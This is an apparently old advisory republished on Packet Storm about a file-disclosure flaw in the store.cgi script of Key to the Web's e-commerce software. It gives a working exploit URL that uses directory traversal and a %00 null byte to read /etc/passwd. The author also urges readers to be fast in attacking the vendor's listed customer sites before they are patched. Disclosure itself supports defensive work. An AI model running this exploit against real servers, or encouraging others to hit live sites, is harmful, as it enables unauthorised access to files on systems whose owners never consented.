Store.cgi from Key to the Web's ecommerace solution contains a vulnerability which allows web users to read any file on the system. Exploit URL included.
0c35ce0b2d171b46048cd2cee55ae9e0bebb76665535c56dce2ba5fe63c19216Hi conrades:
I write about a vulnerability in /cgi-bin/Store/store.cgi <-- This is
part of a software that Key to the web (https://www.keyweb.com) use for
her "e-comerce solutions". In her page you can find a list of posible
webs with this vulnerability (but you must be faster becouse can be
early patched :). The description about this vulnerability is the next:
Name: Key to the web cgi-bin/Store/store.cgi "Show files" vulnerability.
Problem: Adding the string "/../%00" will allow an remote attacker to
be able to view any files on the server.
Exploit:
https://www.victim.com/cgi-
bin/Store/store.cgi?product=../../../../../../../../../etc/passwd%00
by: _TacK_ (TacK@ole.com)
Un saludo para la peña del irc-hispano !!!!!!!
Salud y (A)!!!!!!!!
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed